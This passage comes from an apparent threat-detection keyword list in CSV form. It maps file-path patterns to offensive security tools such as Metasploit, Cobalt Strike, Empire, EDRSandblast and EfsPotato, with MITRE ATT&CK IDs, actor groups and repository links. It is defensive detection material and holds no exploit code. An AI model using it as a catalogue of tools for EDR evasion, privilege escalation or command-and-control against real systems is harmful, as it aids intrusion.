It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/EDRSandblast.git*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*/EDRSandblast/*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*/EfsPotato.git*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*/egghunter.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Egress-Assess*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/elevateit.bat*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*/ElevateKit/elevate.*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*/elf/dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/elf/exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ELFLoader/*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*/Elite/Elite*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 
- T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/email_spoof_checks.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*/EmailAll.git*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*/emailall.py*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*/EmbedInHTML.git*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*/EmbedInHTML/*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*/emotet.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/Empire.git,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - 
T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/empire/client/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z 
-*/empire:latest*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/EmpireProject*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,1,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*/enable-user.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/enableuser/enableuser.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/enableuser/enableuser.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/enc_shellcode.bin*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*/enc_shellcode.h*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*/enip-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/enum__secrets/*.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/enum_av.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_av.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/enum_cisco.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_domain_info*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/enum_f5.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_juniper.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_osx.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_proxy.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_services.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_shares.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_snmp.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
